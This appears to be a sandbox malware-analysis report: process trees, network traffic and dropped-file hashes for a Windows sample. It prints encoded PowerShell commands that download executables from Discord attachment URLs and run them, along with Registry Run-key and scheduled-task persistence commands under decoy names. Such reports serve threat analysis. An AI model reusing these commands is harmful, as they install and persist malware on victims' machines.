"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1380 -ip 1380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 804

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 254.105.26.67.in-addr.arpa udp
US 8.8.8.8:53 198.52.96.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 img.guildedcdn.com udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 31.219.227.13.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
US 8.8.8.8:53 69.103.1.46.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:7355 tcp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
TR 46.1.103.69:4263 tcp

Files

memory/2784-0-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2784-1-0x0000000000980000-0x0000000000996000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat

MD5 d0cec99ca3a717c587689ebf399662c4
SHA1 1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66
SHA256 b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228
SHA512 99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7

memory/1496-4-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/1496-5-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/1496-6-0x00000000027B0000-0x00000000027E6000-memory.dmp

memory/1496-7-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/1496-8-0x0000000005030000-0x0000000005658000-memory.dmp

memory/1496-9-0x0000000004DD0000-0x0000000004DF2000-memory.dmp

memory/1496-10-0x00000000056D0000-0x0000000005736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x5nqzt2r.rli.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1496-11-0x0000000005740000-0x00000000057A6000-memory.dmp

memory/1496-21-0x00000000058B0000-0x0000000005C04000-memory.dmp

memory/1496-22-0x0000000005DB0000-0x0000000005DCE000-memory.dmp

memory/1496-23-0x0000000005E60000-0x0000000005EAC000-memory.dmp

memory/1496-24-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/1496-25-0x0000000007430000-0x0000000007AAA000-memory.dmp

memory/1496-26-0x00000000062A0000-0x00000000062BA000-memory.dmp

memory/2784-27-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/1496-31-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/2168-33-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2168-35-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/2168-34-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/2168-41-0x0000000005FA0000-0x00000000062F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b07e68c027ea6a742f8eb70028f3c4b3
SHA1 cd1d60ba3396b14413de92e65618c88703d5fc73
SHA256 8452dfd10db3b1fba17015a6dba7948b5a76782beb84119602b097637e5ff912
SHA512 1daa6b0564dc7866f88a1cd30ccfe4ec4d8552cb2e6505ab5241a323603c7b8ffd5bf06abb768d1fb3a3b1e36d162307aa6847a60f3be55d7e29768f936d9d90

memory/2168-47-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/2168-50-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4436-52-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

memory/4436-51-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4436-53-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c7541283c2b98573c8e4af77affd1d
SHA1 00bd6af4931f06c8509039a9030ae0bf778d06f5
SHA256 1bfc7cbefee83d45b424892998667d018bc6545541ac1003621b0e9e248c8f25
SHA512 d85df02776475e85e99428d45c929836f38a73485481d3ee2c872266b4a9a9ad395084976addd5c0336a09052e41e0f72c1bec0355e1b0965766930bb0d81f2e

memory/4436-64-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

memory/4436-67-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2332-68-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2332-69-0x0000000005580000-0x0000000005590000-memory.dmp

memory/2332-70-0x0000000005580000-0x0000000005590000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d78da0b1a407d02064e1a683e6a91515
SHA1 46ce5b401087047c413ba6716231fae761c59d41
SHA256 dced05a96fc74f496c32f77c41afab079926c92b633ab623dbb4092c108c2233
SHA512 6ae7197ccaf96286042e463865e445daa85bf6a7f0a02456bf17b7ae5290e99261d2247e934d4b5ce6fd87aa1680626f493852157799727bf46812853cea32ba

memory/2332-81-0x0000000005580000-0x0000000005590000-memory.dmp

memory/2332-84-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2512-85-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2512-86-0x0000000004F60000-0x0000000004F70000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5119dccd6c6683851dd33e6a09ca8e27
SHA1 eeb5f3e46522462149c7ed93d288e62a6fd8790a
SHA256 d6734c288d5a479bc91823c941cec3b46fcf113d303c50cb3aef6830bdcbb626
SHA512 cfeb51e802ba495cebf7d6888aeb9cdccde755bc10feb610ab629d658943a8f2c2f1f0aa97a7dc8e4ea3a3ca37b6444c3bcbb72331f652138bf40af5aeeb828e

memory/2512-97-0x0000000004F60000-0x0000000004F70000-memory.dmp

memory/2512-100-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/3532-101-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/3532-102-0x0000000002760000-0x0000000002770000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8dff0ea200abe0db68b89cd9ee373a86
SHA1 543c8df3221e9f1b872e3dfcffc24f2d14a7ac0a
SHA256 b7d40a4455dffbd410178887871eae4f9a8c11d50aeccdcf082836a529e04c7f
SHA512 621bee5e7950b4ae9a20ae6d2f3dced3b9c21d8835bce6feb8854a8a5e3e54571a2a9c8c894a06982f46ab572b78aa658ce6a8aad81ae257b7d814c088709c75

memory/3532-113-0x0000000002760000-0x0000000002770000-memory.dmp

memory/3532-116-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/1952-117-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/1952-118-0x0000000005300000-0x0000000005310000-memory.dmp

memory/1952-119-0x0000000005300000-0x0000000005310000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8fe6f08f93bce59a32e1dd53220ed93
SHA1 46ef4de2bde6a43f1526f87b3a2136f59fe386b0
SHA256 43712035089e489ecf1ccfd1b20c259d97791cc37cf0aac9a966e107cc039f89
SHA512 fc0a366751b96a849fc533069bd3844cbbfe2156a933b527c5793f169527b1fb5d5a4ef48dea6969f3695e6eab7bc046b1d6f89492482bd99e97c9f42893308c

memory/1952-130-0x0000000005300000-0x0000000005310000-memory.dmp

memory/1952-133-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

memory/4632-137-0x0000000000E20000-0x0000000000E28000-memory.dmp

memory/4632-138-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\bes.bat

MD5 9947ba16f06abcff429e922c49790337
SHA1 bd24d00f50e0d63892fc641a1438551d577b6e50
SHA256 8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f
SHA512 2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11

memory/4632-141-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

memory/448-145-0x0000000000370000-0x0000000000378000-memory.dmp

memory/448-146-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\installer2.bat

MD5 50b98ed3895545b2b72b28966cfa2b0d
SHA1 bf98a58225c8ce199e48825624e793ee8e0ca3f8
SHA256 ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591
SHA512 af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa

memory/448-149-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4000-150-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4000-151-0x0000000004990000-0x00000000049A0000-memory.dmp

memory/4000-157-0x0000000005750000-0x0000000005AA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3d6d729eff6649ceccec1c3c472baef
SHA1 49fbaf7d60bd9a4d496d2804a38bc843bfe9428f
SHA256 5ab2d2d9eb1247a292eb387efbfc40e8afe47322eedaa2f8a68b807c604abd50
SHA512 4a803658111a264a065e226278fcedfd64b8c17ad25c9a85d00440a35d432ff2c3f13e009fe6e3843f68672237e597b87900f151617b39aa1cb9e2dc3d5dd0bc

memory/4000-163-0x0000000004990000-0x00000000049A0000-memory.dmp

memory/4000-164-0x0000000006370000-0x00000000063A2000-memory.dmp

memory/4000-165-0x00000000703C0000-0x000000007040C000-memory.dmp

memory/4000-175-0x0000000006340000-0x000000000635E000-memory.dmp

memory/4000-176-0x0000000006E30000-0x0000000006ED3000-memory.dmp

memory/4000-177-0x0000000007170000-0x000000000717A000-memory.dmp

memory/4000-178-0x0000000007360000-0x00000000073F6000-memory.dmp

memory/4104-179-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\es.bat

MD5 b00ef4b757bc25a0f41c3d74961ff9a0
SHA1 cfdaca2c4c8f1fce33275361260b251d8d74173a
SHA256 417a75bfa635462b42c3509d826180f719593eacbe29778352461c28579ddd76
SHA512 259aef5462238ec388e469de0cbec03f057f536931680060835958a3028aef3a534a13e6f7c6ada6cea12cc520df09a1143ec79920bdd39cc0c875639ba2d93a

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8dd057b34ef460c75e2cf850597e6af
SHA1 92021d50c99ffc1e1a17a71a074bc8b4b527a129
